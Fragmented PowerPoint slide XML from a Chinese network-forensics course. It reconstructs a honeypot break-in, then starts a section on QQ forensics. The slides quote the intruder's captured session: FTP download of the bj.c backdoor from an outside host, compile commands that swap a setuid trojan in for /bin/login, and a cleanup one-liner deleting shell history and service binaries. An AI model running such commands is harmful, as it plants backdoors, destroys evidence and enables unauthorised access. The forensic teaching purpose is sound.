            <a:endPar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[root@apllo/]# ftp 24.112.167.35</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Connected to 24.112.167.35</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220 Linux FTP server (Version wu-2.5.0(1) Tue Sep 21 16:48:12 EDT 1999) ready.</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Name (24.112.167.35:twin): welek</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331 Password required for welek.</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Password: password</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230 User welek logged in.</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Remote system type is UNIX.</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Using binary mode to transfer files.</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ftp&gt; get bj.c</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local: bj.c remote: bj.c</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200 PORT command successful.</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150 Opening BINARY mode data connection for bj.c (1010 bytes).</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226 Transfer complete.</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1010 bytes received in 0.115 sees (8.6 Kbytes/sec)</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ftp&gt; quit</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221-You have transferred 1010 bytes in 1 files.</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221-Total traffic for this session was 1421 bytes in 1 transfers.</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221-Thank you for using the FTP service on linux.</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221 Goodbye.</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6.6.3 现场重建</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="矩形 4"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="830580" y="835660"/>
            <a:ext cx="7482840" cy="1799590"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr fontAlgn="auto" latinLnBrk="1">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="16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3．“黑帽”攫取后门，编译bj.c，并安装代替/sbin/login：</a:t>
            </a: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注意所有命令都是在编译命令提示符下执行的。所有编译命令看上去都是以“剪切和粘贴”的形式执行的。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="zh-CN" sz="16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endParaRPr lang="zh-CN" altLang="zh-CN" sz="16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gcc -o login bj.cchown root:bin loginchmod 4555 loginchmod u-w logincp </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/bin/login /usr/bin/xstatcp /bin/login /usr/bin/old    rm/bin/loginchmod 555 /usr/bin/xstatchgrp </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bin/usr/bin/xstatmv login/bin/loginrm bj.cgcc –o login bj.c</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bj.c:16: unterminated string or character constant</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bj.c:12: possible real start of unterminated constant</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6.6.3 现场重建</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="矩形 4"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="830580" y="835660"/>
            <a:ext cx="7482840" cy="2938145"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr fontAlgn="auto" latinLnBrk="1">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="12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下面，“黑帽”企图执行这个已编译的后门程序。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr fontAlgn="auto" latinLnBrk="1">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr lang="zh-CN"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chown root:bin login</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chown: login: No such file or directory</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chown 4555 login</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chown: login: No such file or directory</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chown u-w login</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chown: login: No such file or directory</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cp /bin/login /usr/bin/xstat</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cp /bin/login /usr/bin/old</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rm /bin/login</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chmod 555 /usr/bin/xstat</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chgrp bin /usr/bin/xstat</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mv login /bin/login</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mu:login: No such file or directory</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rm bj.c</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6.6.3 现场重建</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="矩形 4"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="88900" y="817880"/>
            <a:ext cx="5415280" cy="2584450"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr fontAlgn="auto" latinLnBrk="1">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="12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“黑帽”不能获得权限，于是重试一遍，通过ftp连接到站点重新下载程序。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr fontAlgn="auto" latinLnBrk="1">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr lang="zh-CN" altLang="zh-CN" sz="900"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ftp 24.112.167.35</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Connected to 24.112.167.35</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220 linux FTP server (Version wu-2.5.0(1) Tue Sep 21 16:48:12 EDT 1999) ready.</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Name (24.112.167.35:twin): [root@apollo /]#  ftp 24.112.167.35</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Connected to 24.112.167.35.</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220 linux FTP server (Version wu-2.5.0(1) Tue Sep 21 16:48:12 EDT 1999) ready.</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Name (24.112.167.35:twin): welek</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331 Password required for welek.</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Password:331 Password required for welek.</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Password:password</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230 User welek logged in.</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Remote system type is UNIX.</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Using binary mode to transfer files.</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="zh-CN" sz="900"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50000"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr lang="zh-CN" altLang="zh-CN" sz="900"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4788535" y="1348740"/>
            <a:ext cx="4435475" cy="1591945"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="68580" tIns="34290" rIns="68580" bIns="34290" rtlCol="0" anchor="t">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>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ftp&gt;get bj.c</a:t>
            </a:r>
            <a:endPar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qulocal: bj.c remote: bj.c</a:t>
            </a:r>
            <a:endPar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200 PORT command successful.</a:t>
            </a:r>
            <a:endPar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u150 Opening BINARY mode data connection for bj.c (1011 bytes).</a:t>
            </a:r>
            <a:endPar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226 Transfer complete.</a:t>
            </a:r>
            <a:endPar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1011 bytes received in 0.134 secs (7.3 Kbytes/sec)</a:t>
            </a:r>
            <a:endPar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ftp&gt;quit</a:t>
            </a:r>
            <a:endPar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221-You have transferred 1011 bytes in 1 files.</a:t>
            </a:r>
            <a:endPar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221-Total traffic for this session was 1422 bytes in 1 transfers.</a:t>
            </a:r>
            <a:endPar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221-Thank you for using the FTP service on linux.</a:t>
            </a:r>
            <a:endPar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221 Goodbye.</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6.6.3 现场重建</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="矩形 4"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1508760" y="977265"/>
            <a:ext cx="6030595" cy="1622425"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr fontAlgn="auto" latinLnBrk="1">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="12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现在他尝试第三次编译后门程序。注意攻击者使用了相同的“剪切和粘贴”命令。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr fontAlgn="auto" latinLnBrk="1">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr lang="zh-CN" altLang="zh-CN" sz="12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gcc -o login bj.cchown root:bin loginchmod 4555 loginchmod u-w logincp </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/bin/login   /usr/bin/xstatcp  /bin/login  /usr/bin/old    rm /bin/loginchmod 555 </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/usr/bin/xstatchgrp bin /usr/bin/xstatmv login /bin/loginrm bj.cgcc –o login bj.c</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bj.c: In function ‘owned’:</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bj.c:16: warning: assignment makes pointer from integer without a cast</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="zh-CN" sz="12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50000"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr lang="zh-CN" altLang="zh-CN" sz="900"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6.6.3 现场重建</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="矩形 4"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1026795" y="822325"/>
            <a:ext cx="6931660" cy="3184525"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr fontAlgn="auto" latinLnBrk="1">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pP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现在，已编译的后门程序已经成功实现了。/bin/login的有效拷贝被转移到/user/bin/xstat，而已编译的木马程序bj.c代替了/bin/login，这就是后门。木马程序允许任何人在VT9111的环境下通过term装置进行未授权访问。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr fontAlgn="auto" latinLnBrk="1">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr lang="zh-CN" altLang="zh-CN" sz="12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chown root:bin login</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chmod 4555 login</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chown u-w login</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cp /bin/login /usr/bin/xstat</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cp: /bin/login: No such file or directory</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cp /bin/login /usr/bin/old</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cp: /bin/login: No such file or directory</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rm /bin/login</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rm: cannot remove ‘/bin/login’: No such file or directory</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chmod 555 /usr/bin/xstat</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chgrp bin /usr/bin/xstat</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mv login /bin/login</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6.6.3 现场重建</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="矩形 4"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1026795" y="822325"/>
            <a:ext cx="6931660" cy="3184525"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr fontAlgn="auto" latinLnBrk="1">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pP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现在，已编译的后门程序已经成功实现了。/bin/login的有效拷贝被转移到/user/bin/xstat，而已编译的木马程序bj.c代替了/bin/login，这就是后门。木马程序允许任何人在VT9111的环境下通过term装置进行未授权访问。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr fontAlgn="auto" latinLnBrk="1">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr lang="zh-CN" altLang="zh-CN" sz="12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chown root:bin login</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chmod 4555 login</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chown u-w login</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cp /bin/login /usr/bin/xstat</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cp: /bin/login: No such file or directory</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cp /bin/login /usr/bin/old</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cp: /bin/login: No such file or directory</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rm /bin/login</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rm: cannot remove ‘/bin/login’: No such file or directory</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chmod 555 /usr/bin/xstat</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chgrp bin /usr/bin/xstat</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mv login /bin/login</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608877" y="1337721"/>
            <a:ext cx="2055371" cy="156966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smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:srgbClr val="003466"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>6.2</a:t>
            </a:r>
            <a:endPar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614" y="2115293"/>
            <a:ext cx="1781944"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3664248" y="2114659"/>
            <a:ext cx="5644852" cy="7892"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="95250" cap="flat" cmpd="sng" algn="ctr">
            <a:solidFill>
              <a:srgbClr val="003466"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
      </p:cxnSp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="2" name="图片 1"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3" cstate="print"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="7213600" y="2785745"/>
            <a:ext cx="1930400" cy="2325370"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="文本框 2"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3653790" y="1661160"/>
            <a:ext cx="4398010" cy="460375"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
            <a:scene3d>
              <a:camera prst="orthographicFront"/>
              <a:lightRig rig="threePt" dir="t"/>
            </a:scene3d>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" b="1" kern="0"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TCP/IP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1" kern="0"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基础</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2400" b="1" kern="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4"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6.6.3 现场重建</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="矩形 4"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="899795" y="537845"/>
            <a:ext cx="6931660" cy="4431030"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr fontAlgn="auto" latinLnBrk="1">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="16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4．“黑帽”掩盖其的行为：</a:t>
            </a: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利用了“剪切和粘贴”命令，且都在单一命令提示符下执行。同时，可以看出这是一个“普遍”清除脚本，试图移动那些不存在的文件。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr fontAlgn="auto" latinLnBrk="1">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:endPar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rm bj.c</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[root@apollo /]# ps –aux | grep inetd; ps –aux grep portmap;rm /sbin/portmap;rm /tmp/h;rm /usr/sbin/rpc.portmap;rm –rf .bash*;rm –rf/root/.bash_history; rm –rf /usr/sbin/namedps –aux|grep inetd;ps –aux|grep portmap;rm /sbin/por&lt;grep inetd;ps –aux | grep portmap ; rm /sbin/port map;rm /tmp/h ;rm /usr&lt;p  portmap ; rm /sbin/portmap ;  rm /tmp/h ; rm /usr/  sbin/rpc.portmap ; rm rf&lt;ap ; rm  /tmp h ; rm  /usr/sbin rpc.portmap ; rm -rf  .bash* ; rm –rf /root/.ba&lt;bin/rpc.portmap ; rm –rf .bash* ; rm –rf /root/.bas h_history ; rm –rf /usr/s&lt;bash* ; rm –rf /root/.bash_history ; rm –rf /usr/sb  in/named</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359 ?   00:00:00 inetd </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359 ?   00:00:00 inetd</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rm: cannot remove ‘/tmp/h’: No such file or directory</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rm: cannot remove ‘/usr/sbin/rpc.portmap’: No such file or directory</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ps aux | grep portmap</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ps –aux | grep inetd; ps –aux grep portmap; rm /sbin/portmap;rm /tmp/h;rm /usr/sbin/rpc.portmap;rm –rf .bash*;rm –rf/root/.bash_history; rm –rf /usr/sbin/namedps –aux | grep inetd;ps –aux | grep portmap;rm /sbin/por&lt;grep inetd;ps –aux| grep portmap;rm /sbin/port  map;rm /tmp/h ;rm /usr&lt;p portmap ; rm /sbin/portmap ;  rm /tmp/h ; rm /usr/ sbin/rpc.portmap;rm rf&lt;ap ; rm  /tmp h ;  rm  /usr/sbin rpc.portmap  ;  rm -rf  .bash* ; rm –rf /root/.ba&lt;bin/rpc.portmap ; rm –rf .bash* ; rm –rf /root/.bas  h_history ; rm –rf /usr.s&lt;bash* ; rm –rf /root/.bash_history ; rm –rf /usr/sb  in/named</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359 ?   00:00:00 inetd </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rm: cannot remove ‘/sbin/portmap’: No such file or directory</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rm: cannot remove ‘/tmp/h’: No such file or directory</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rm: cannot remove ‘/usr/sbin/rpc.portmap’: No such file or directory</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr fontAlgn="auto" latinLnBrk="1">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="9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rm: cannot remove ‘/sbin/portmap’: No such file or directory</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6.6.3 现场重建</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="矩形 4"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="899795" y="932815"/>
            <a:ext cx="6931660" cy="2861310"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr fontAlgn="auto" latinLnBrk="1">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pP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“黑帽”的普遍清除脚本程序似乎产生了错误，因为它试图移动那些不存在的文件。“黑帽”也意识到这一点，因为他接下来试图手动移动这些同名文件，尽管这些文件并不存在。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN"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50000"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr lang="zh-CN"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rm: cannot remove ‘/tmp/h’: No such file or directory</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rm: cannot remove ‘/usr/sbin/rpc.portmap’: No such file or directory</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rm: cannot remove ‘/sbin/portmap’: No such file or directory</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rm: cannot remove ‘/tmp/h’: No such file or directory</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rm: cannot remove ‘/usr/sbin/rpc.portmap’: No such file or directory</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[root@apollo /]# exit</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exit</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[twin@apollo /]$ exit</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr fontAlgn="auto" latinLnBrk="1">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="10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logout</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6.6.3 现场重建</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="矩形 4"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="899795" y="932815"/>
            <a:ext cx="6931660" cy="1383665"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr fontAlgn="auto" latinLnBrk="1">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pP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这样，“黑客”就成功安装了一个后门bj.c，这个后门允许未授权用户在VT91111环境下通过term装置访问。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr fontAlgn="auto" latinLnBrk="1">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pP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退出系统后，“黑帽”又进行了几次连接，并对系统做了一些修改。检查原始数据就能了解“黑帽”所做的操作。</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6.6.3 现场重建</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="矩形 4"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="899795" y="932815"/>
            <a:ext cx="6931660" cy="2399665"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr fontAlgn="auto" latinLnBrk="1">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pP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en-US" altLang="zh-CN" sz="16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zh-CN" altLang="zh-CN" sz="16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5．返回进行Trinoo攻击：</a:t>
            </a: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系统安全一旦受到威胁，就断开网络以检查数据（例如Tripwire）。然而，可以注意到接下来的一个星期里各种各样的系统都试图远程登录到陷阱机上。很明显，“黑帽”试图返回，很可能是为了利用安全已遭破坏的系统从事更多的恶意行为。因此，可以让已受攻击的陷阱机重新联网，看看“黑帽”是否会返回，以及会进行什么操作。不出所料，大约两个星期后，“黑帽”果然返回。利用snort可以再次得到他所有击键动作。通过下面的telnet会话，就可以了解已攻击的系统如何被用作Trinoo客户端。</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6.6.4 取证分析</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="矩形 4"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="899795" y="932815"/>
            <a:ext cx="7047865" cy="2445385"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr fontAlgn="auto" latinLnBrk="1">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US"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zh-CN" altLang="zh-CN"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取证分析</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="zh-CN" b="1" u="sng"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50000"/>
              </a:lnSpc>
            </a:pP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通过这个例子，逐步分析了一个蜜罐的安全是如何遭到破坏的。借助对系统日志和snort的日志和报警的取证分析，可以确定系统安全遭到威胁的全过程。从发现攻击，到通过分析日志文件还原、再现这一攻击，分析人员建立了完整而清晰的时间线和证据链。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr fontAlgn="auto" latinLnBrk="1">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pP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网络取证依赖于对数据源数据的深入理解以及建立在对网络架构、网络协议、恶意攻击判断等基础知识上的经验和技能。通过本实例，分析和调查人员应当对取证分析过程中期望寻找的东西有更深刻的理解。</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619293" y="1337721"/>
            <a:ext cx="2034540" cy="156845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smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:srgbClr val="003466"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>6.7</a:t>
            </a:r>
            <a:endParaRPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="9600" b="1" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="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614" y="2115293"/>
            <a:ext cx="1781944"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3654088" y="2114024"/>
            <a:ext cx="5644852" cy="7892"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="95250" cap="flat" cmpd="sng" algn="ctr">
            <a:solidFill>
              <a:srgbClr val="003466"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
      </p:cxnSp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="2" name="图片 1"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3" cstate="print"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="7213600" y="2785745"/>
            <a:ext cx="1930400" cy="2325370"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="文本框 2"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3653790" y="1661160"/>
            <a:ext cx="4398010" cy="460375"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
            <a:scene3d>
              <a:camera prst="orthographicFront"/>
              <a:lightRig rig="threePt" dir="t"/>
            </a:scene3d>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1" kern="0"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QQ取证</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4"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6.7 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:prstClr val="black">
                    <a:lumMod val="75000"/>
                    <a:lumOff val="25000"/>
                  </a:prstClr>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>QQ</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:prstClr val="black">
                    <a:lumMod val="75000"/>
                    <a:lumOff val="25000"/>
                  </a:prstClr>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>取证</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="矩形 4"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="899795" y="1043940"/>
            <a:ext cx="7047865" cy="3184525"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr fontAlgn="auto" latinLnBrk="1">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US"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en-US" altLang="zh-CN"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QQ</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"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的发展与取证的意义</a:t>
            </a:r>
            <a:endParaRPr lang="en-US"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50000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US"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OICQ是腾讯公司1999年推出的即时通信软件，2000年更名为QQ，目前也是国内最流行的聊天工具之一。其不仅传递文字消息，还集成了文件传输、语音聊天、视频会议、电子邮件、用户群、新闻浏览，短信发送、微博等诸多功能，越来越多的用户通过QQ软件进行语音视频聊天，资源共享，发送电子邮件或者组建用户群。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr fontAlgn="auto" latinLnBrk="1">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN"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随着QQ的广泛应用，利用QQ软件进行恶性犯罪的案例逐年上升。如发布虚假中奖信息及钓鱼网站，侵犯他人财产安全；联络、煽动组织成员进行打砸抢烧，危害公共安全；泄露国家秘密、情报或军事秘密，危害国家安全等。因此，开展QQ取证与司法鉴定方法研究具有迫切的现实意义。</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sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>6.7.1 发展现状</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="矩形 4"/>
          <p:cNvSpPr/>
          <p:nvPr/>
